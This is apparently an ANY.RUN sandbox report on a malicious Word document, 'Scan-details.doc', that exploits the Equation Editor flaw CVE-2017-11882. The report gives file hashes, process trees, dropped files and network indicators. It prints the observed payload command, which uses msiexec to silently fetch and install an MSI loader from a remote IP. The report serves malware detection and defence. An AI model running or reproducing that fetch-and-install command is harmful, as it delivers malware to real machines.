analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Scan-details.doc

Full analysis: https://app.any.run/tasks/910d0909-7017-4185-b4c1-9cc25ed951e3
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 15, 2018, 06:03:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
trojan
loader
exe-to-msi
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

D4AC43831884FF4DFBF39ED7789FA2D0

SHA1:

C2853BAB0B7235910CA149B89E431076D791C315

SHA256:

4019338E077FA2335284911D12032FFDE7F54908E00E0F84B97BC7714EE20D96

SSDEEP:

768:QmKfcZpEHUqUisx+NLB0oMVSWcMDSzO+zSO9kq4Q/6wT7WWugAZhbS5:Q4ZcUisxYtjh9tIo

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 1660)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3564)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3904)
    • Downloads executable files from IP

      • msiexec.exe (PID: 3904)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3564)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3904)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3904)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3000)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3000)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3564)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3904)
    • Application was dropped or rewritten from another process

      • MSI966B.tmp (PID: 4044)
      • MSI966B.tmp (PID: 3048)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3904)
      • MSI966B.tmp (PID: 4044)
    • Application launched itself

      • MSI966B.tmp (PID: 4044)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
7
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe msi966b.tmp no specs msi966b.tmp no specs

Process information

PID
CMD
Path
Indicators
Parent process
3000"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Scan-details.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3564"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
1660cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/se.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2860msiexec.exe /i http://34.244.180.39/se.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3904C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
4044"C:\Windows\Installer\MSI966B.tmp"C:\Windows\Installer\MSI966B.tmpmsiexec.exe
User:
admin
Company:
senti
Integrity Level:
MEDIUM
Exit code:
0
Version:
2.08.0006
3048C:\Windows\Installer\MSI966B.tmp"C:\Windows\Installer\MSI966B.tmpMSI966B.tmp
User:
admin
Company:
senti
Integrity Level:
MEDIUM
Version:
2.08.0006
Total events
1 571
Read events
881
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
3
Text files
9
Unknown types
5

Dropped files

PID
Process
Filename
Type
3000WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR88EB.tmp.cvr
MD5:
SHA256:
3904msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF090D3956C0FA72B5.TMP
MD5:
SHA256:
3904msiexec.exeC:\Config.Msi\1693ea.rbs
MD5:
SHA256:
3904msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF2AE2286E0CCD248F.TMP
MD5:
SHA256:
3000WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:70C278D8BB09C3041479A9BC2AF4E1A9
SHA256:D69E23B5D0FBBBEA2B15D68BAE73B8D21CB5A54E7F9352E099020E7F51DABA60
3904msiexec.exeC:\Windows\Installer\MSI9148.tmpexecutable
MD5:B4D2AEF42238B8C5CFAA8E113466778B
SHA256:5A926EE0A49494186FAFAFEF0D6A9357E179758F784D46774280FFE4E8065B91
3904msiexec.exeC:\Users\admin\AppData\Local\Temp\Cookies\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
3904msiexec.exeC:\Users\admin\AppData\Local\Temp\History\History.IE5\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
3904msiexec.exeC:\Windows\Installer\MSI966B.tmpexecutable
MD5:4221674505DB0D49CAF751365A0274F9
SHA256:2625F3CE45756143CA484053FFCEAFB7D475E01A289246DFA08762B7213C867A
3904msiexec.exeC:\Windows\Installer\MSI94A4.tmpbinary
MD5:F03112754830C39159FBBAD689A69444
SHA256:EA13C9C80BCE956DE99D836418574491DD71B29BEE265CE758ADCA560BF27E32
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3904
msiexec.exe
GET
200
34.244.180.39:80
http://34.244.180.39/se.msi
IE
executable
1.27 Mb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3904
msiexec.exe
34.244.180.39:80
Amazon.com, Inc.
IE
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
3904
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
3904
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3904
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3904
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
1 ETPRO signatures available at the full report
No debug info